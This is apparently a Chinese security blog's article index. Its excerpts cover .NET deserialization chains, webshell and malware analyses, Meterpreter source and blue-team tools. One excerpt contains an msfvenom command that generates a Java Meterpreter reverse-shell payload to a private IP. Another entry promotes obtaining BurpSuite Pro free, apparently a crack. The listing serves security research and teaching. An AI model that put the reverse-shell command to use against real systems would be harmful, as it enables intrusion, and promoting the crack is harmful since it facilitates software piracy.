前言 昨天建了一个公开漏洞POC库,想用neclei ,但是写漏洞检测的yaml实在太麻烦了。至今没有找到能够方便编写yaml的工具。平时时间就那么一点点,一个个漏洞去写岂不是累死了。 于是就想起了用...
11月14日26 views评论net
插件
使用AI自动化生成漏洞检测与利用脚本以及人人都能当黑客时代的反思
11月14日26 views评论net
插件
11月14日26 views评论net
插件
.NET 反序列化最新攻击链 XamlImageInfo
0x01 基本介绍 XamlImageInfo类属于命名空间 System.Activities.Presentation.Internal,通常用于WPF处理与图像和图标相关的功能。本次更新的gad...
10月23日22 views评论net
反序列化
记一次对某变异webshell的分析
0x01 前言在某活动中捕获到一个变异的webshell(jsp文件格式),如图1.1所示。样本webshell的大致功能是通过加载字节码来执行恶意代码,整个webshell的核心部分逻辑是在字节码中...
10月10日35 views评论net
webshell
分析哥斯拉内存加载Jar技术
背景哥斯拉在第一版的时候就提供了一个黑魔法:内存加载Jar功能。从当时的介绍来看,这个功能本来是为上传数据库驱动用的,后面配合JNA可以实现无文件加载ShellCode,一切都在内存中执行,大大扩展了...
10月10日47 views评论net
内存
Meterpreter源码分析
一、生成木马上线msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.245.129 LPORT=4444 > /home/rkabyss...
09月24日41 views评论net
payload
冰蝎漏洞分析另附娱乐向XSS poc
免责声明: 本公众号致力于安全研究和红队攻防技术分享等内容,本文中所有涉及的内容均不针对任何厂商或个人,同时由于传播、利用本公众号所发布的技术或工具造成的任何直接或者间接的后果及损失,均由使用者本人承...
08月31日96 views评论net
xss
渗透测试神器BurpSuitePRO可以免费白嫖正版了?一分钟搞定!快给自己安排一个!
Burpsuite是一个用于测试Web应用程序安全性的图形化工具。该工具使用java编写,由PortSwigger Web Security开发,几乎是网络安全从业人员人手必备的软件。 Pro版官网:...
08月12日100 views评论burp
net
护网蓝队的常用工具和溯源平台,护网前的最后一晚,冲冲冲!!!
护网前的最后一晚,给大家整理了,蓝队常用的分析工具和平台(放文末),希望大家都能挺住,机房平平安安。 接下来,先来一波云上做法,保佑大家机房平安!!! 佛教 道教 天主教 三教齐聚,平安顺利,如果还不...
08月09日78 views评论ip
net
.NET代码审计XXE漏洞系列-详解XmlReader
0x01 XmlReader介绍 XmlReader是.NET中最常用的XML读取类,通过Read()实例方法不断读取Xml文档中的声明,节点开始,节点内容,节点结束,以及空白等等,直到文档结束Rea...
08月07日11 views评论net
安全攻防
深入分析BundleBot新型恶意软件
Check Point Research (CPR)对被称为BundleBot的新型恶意软件进行了深入分析发现,BundleBot滥用dotnet bundle(单文件),这是一种自包含的格式,可以很...
08月06日12 views评论net
二进制文件
关于狠魔幻的事-看到最后
原创Paper | 从入门 .NET 到分析金蝶反序列化漏洞学习笔记
作者:Sunflower@知道创宇404实验室 日期:2023年7月10日 1.前言 参考资料由于金蝶云星空能够使用 format 参数指定数据格式为二进制,攻击者可以通过发送由 BinaryForm...
07月12日20 views评论net
反序列化漏洞
